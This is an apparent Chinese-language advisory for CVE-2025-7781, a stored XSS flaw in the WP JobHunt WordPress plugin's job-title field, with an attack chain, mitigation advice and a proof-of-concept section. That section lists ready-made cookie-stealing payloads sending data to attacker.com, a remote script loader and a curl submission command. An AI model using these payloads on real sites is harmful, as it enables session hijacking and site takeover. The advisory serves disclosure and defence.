CVE-2025-7781：WP JobHunt插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-7781

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WP JobHunt WordPress插件（JobCareer主题）

漏洞概述

CVE-2025-7781是WordPress的WP JobHunt插件中存在的一个存储型跨站脚本（Stored XSS）漏洞。该插件是JobCareer求职主题的核心组件，广泛应用于各类招聘网站中。漏洞存在于所有7.6及以下版本中，由于插件对用户输入的'cs_job_title'参数缺乏充分的输入净化和输出转义处理，导致经过身份验证的攻击者可以将恶意JavaScript代码注入到网页中。当其他用户访问被注入的页面时，恶意脚本将在受害者浏览器中自动执行，可能导致会话劫持、敏感信息窃取、权限提升或恶意重定向等严重后果。该漏洞由Wordfence安全团队的研究员发现并报告，其CVSS 3.1评分为6.4分，属于中危级别漏洞。虽然漏洞利用需要Candidate级别及以上的认证权限，但由于存储型XSS的特殊性，一旦恶意脚本被存储，任何访问受影响页面的用户（包括管理员）都可能成为攻击目标，潜在危害不容忽视。建议所有使用该插件的网站管理员尽快检查并更新到安全版本，以消除安全隐患。

技术细节

该漏洞的核心技术原理在于WP JobHunt插件在处理职位标题（cs_job_title）参数时，未对用户输入进行充分的HTML实体编码或标签过滤，导致攻击者可以注入任意HTML和JavaScript代码。具体技术细节如下：

1. **输入点**：插件的职位创建或编辑功能中，'cs_job_title'参数接收用户输入的职位名称。

2. **存储机制**：由于缺乏输入净化，恶意脚本被直接存储到数据库中。插件未使用WordPress标准的sanitize_text_field()、wp_kses()或esc_html()等安全函数对输入进行处理。

3. **输出缺陷**：在页面渲染时，插件直接将存储的数据输出到HTML页面中，未进行适当的输出转义（如esc_html()或esc_attr()），使得浏览器将恶意输入解析为可执行代码而非纯文本。

4. **利用方式**：攻击者通过Candidate级别账户登录后，在职位标题字段中注入类似`<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>`的恶意代码。当管理员或其他用户查看该职位列表或详情页时，脚本自动执行，可窃取cookie、会话令牌，或执行进一步的攻击行为。

5. **权限要求**：漏洞利用需要Candidate级别认证，但存储型XSS的危害会扩散到所有访问受影响页面的用户，特别是管理员用户，可能导致网站完全失陷。

攻击链分析

STEP 1

步骤1：获取认证账户

攻击者注册或获取一个具有Candidate级别权限的WordPress账户。JobCareer主题通常允许用户注册为求职者（Candidate），该权限级别足以访问职位相关功能。

STEP 2

步骤2：定位注入点

攻击者登录后，导航到职位创建或编辑页面，定位到cs_job_title参数对应的输入字段。

STEP 3

步骤3：注入恶意载荷

在职位标题字段中输入精心构造的恶意JavaScript代码，如窃取cookie、重定向到钓鱼页面或加载外部恶意脚本的payload。

STEP 4

步骤4：提交并存储

提交表单后，由于插件未对输入进行净化处理，恶意脚本被直接存储到WordPress数据库中。

STEP 5

步骤5：等待受害者访问

当管理员或其他用户浏览包含该职位的页面时，由于输出未转义，恶意脚本在受害者浏览器中自动执行。

STEP 6

步骤6：执行恶意行为

脚本可窃取管理员会话cookie、进行权限提升、植入后门、重定向到恶意网站或执行其他恶意操作，最终可能导致网站完全失陷。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-7781 PoC: Stored XSS via cs_job_title parameter -->
<!-- Step 1: Login as Candidate-level user -->
<!-- Step 2: Navigate to job creation/edit page -->
<!-- Step 3: Inject malicious payload in cs_job_title field -->

<!-- Malicious payload examples for cs_job_title parameter: -->

<!-- Payload 1: Cookie stealing -->
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

<!-- Payload 2: Session hijacking via fetch -->
<script>fetch('https://attacker.com/log',{method:'POST',body:JSON.stringify({cookies:document.cookie,url:location.href})});</script>

<!-- Payload 3: Admin privilege escalation (phishing) -->
<script>var s=document.createElement('script');s.src='https://attacker.com/admin-hijack.js';document.body.appendChild(s);</script>

<!-- Payload 4: Event-based XSS (bypasses some filters) -->
<img src=x onerror="fetch('https://attacker.com/x',{method:'POST',body:document.cookie})">

<!-- Step 4: Submit the form - payload is stored in database -->
<!-- Step 5: When any user (especially admin) views the job listing/detail page, the script executes automatically -->

<!-- Using curl for automated exploitation (requires valid session cookie): -->
/*
curl -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -H 'Cookie: wordpress_logged_in_xxx=xxx' \
  -d 'action=cs_job_post&cs_job_title=<script>alert(document.cookie)</script>&...'
*/

影响范围

WP JobHunt插件 < 7.6（所有7.6及以下版本）

防御指南

临时缓解措施

在等待官方补丁发布期间，建议采取以下临时缓解措施：1）限制Candidate级别用户的注册和访问权限，或暂时禁用该用户角色；2）通过Web应用防火墙（WAF）规则过滤cs_job_title参数中的HTML标签和JavaScript关键字；3）在主题functions.php中添加输出过滤钩子，对职位标题进行强制转义；4）部署Content Security Policy头部，限制内联脚本执行；5）密切监控管理员账户的登录和操作日志，及时发现可疑活动；6）定期检查数据库中存储的职位数据，清除已注入的恶意内容。